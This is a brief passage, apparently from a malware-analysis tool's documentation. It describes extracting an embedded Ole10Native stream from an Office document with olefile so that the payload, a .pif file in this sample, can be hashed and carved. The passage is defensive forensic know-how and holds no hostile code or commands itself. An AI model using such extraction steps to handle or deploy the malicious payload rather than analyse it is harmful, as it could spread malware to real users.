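On a real document, read the stream with olefile (olefile.OleFileIO(path).openstream("ObjectPool/_1597663758/Ole10Native").read()) and hand the bytes to assess_package; the data field is the payload to hash and carve, which for this sample is what the report lists as ole10native_00_5C.pif.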